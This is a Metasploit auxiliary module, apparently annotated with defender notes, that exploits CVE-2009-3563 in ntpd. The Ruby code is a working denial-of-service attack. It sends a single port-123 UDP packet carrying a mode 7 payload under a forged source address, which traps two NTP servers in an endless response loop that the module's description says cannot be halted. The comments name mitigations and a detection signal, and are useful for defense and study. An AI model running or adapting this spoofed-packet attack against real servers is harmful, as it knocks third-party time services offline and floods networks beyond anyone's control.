Path: blob/master/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb
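##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary scanner module for the ntpd mode 7 response-loop flaw tracked as
# CVE-2009-3563 (see 'References' below).
#
# For each target host it sends one UDP datagram, port 123 to port 123, whose
# IP source address is the LHOST option rather than the sender's own address.
# As the module description states, the resulting loop between the two
# daemons cannot be stopped by the sender once it has started.
#
# Notes for defenders reading this listing:
# - The effect depends on a forged source address, so source-address
#   validation at the network edge (BCP 38 style ingress/egress filtering)
#   prevents the packet from being delivered as written.
# - Host-side hardening is to run a fixed ntpd release (see the linked
#   bugs.ntp.org entry) and to refuse mode 7 queries from untrusted sources,
#   e.g. with ntpd `restrict ... noquery` rules.
# - The datagrams built here carry a 1-byte or 4-byte UDP payload whose first
#   byte has its low three bits set to 7. Ordinary NTP time packets are at
#   least 48 bytes, so very short port 123 to port 123 datagrams are a usable
#   detection signal.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Capture
  include Msf::Auxiliary::Scanner

  # Registers the module metadata and its single required option, LHOST.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'NTP.org ntpd Reserved Mode Denial of Service',
        'Description' => %q{
          This module exploits a denial of service vulnerability
          within the NTP (network time protocol) demon. By sending
          a single packet to a vulnerable ntpd server (Victim A),
          spoofed from the IP address of another vulnerable ntpd server
          (Victim B), both victims will enter an infinite response loop.
          Note, unless you control the spoofed source host or the real
          remote host(s), you will not be able to halt the DoS condition
          once begun!
        },
        'Author' => ['todb'],
        'License' => MSF_LICENSE,
        'References' => [
          ['BID', '37255'],
          ['CVE', '2009-3563'],
          ['OSVDB', '60847'],
          ['URL', 'https://bugs.ntp.org/show_bug.cgi?id=1331']
        ],
        'DisclosureDate' => '2009-10-04',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptAddressLocal.new('LHOST', [true, 'The spoofed address of a vulnerable ntpd server'])
      ]
    )
    # The capture mixin's FILTER and PCAPFILE options are not used by this
    # module, so they are hidden from the operator.
    deregister_options('FILTER', 'PCAPFILE')
  end

  # Builds and sends one datagram to the given host.
  #
  # The capture handle is now released in an `ensure` clause; previously an
  # exception raised while building or sending the packet skipped close_pcap
  # and left the handle open.
  #
  # @param ip [String] target address; presumably supplied once per host by
  #   Msf::Auxiliary::Scanner (confirm against the mixin)
  def run_host(ip)
    open_pcap

    begin
      print_status("Sending a mode 7 packet to host #{ip} from #{datastore['LHOST']}")

      # Two payload variants, picked at random per host. Both first bytes have
      # their low three bits equal to 7 (mode 7); 0x97 additionally has the
      # top bit set, which looks like the mode 7 response flag.
      # NOTE(review): confirm the bit layout against ntpd's ntp_request.h.
      variants = ["\x17", "\x97\x00\x00\x00"]

      pkt = PacketFu::UDPPacket.new
      pkt.ip_saddr = datastore['LHOST'] # forged source: the second ntpd host
      pkt.ip_daddr = ip
      pkt.ip_ttl = 255
      # Source and destination port are both 123, so a reply from the target
      # is addressed to the NTP port of the LHOST machine.
      pkt.udp_src = 123
      pkt.udp_dst = 123
      pkt.payload = variants.sample
      pkt.recalc
      capture_sendto(pkt, ip)
    ensure
      close_pcap
    end
  end
end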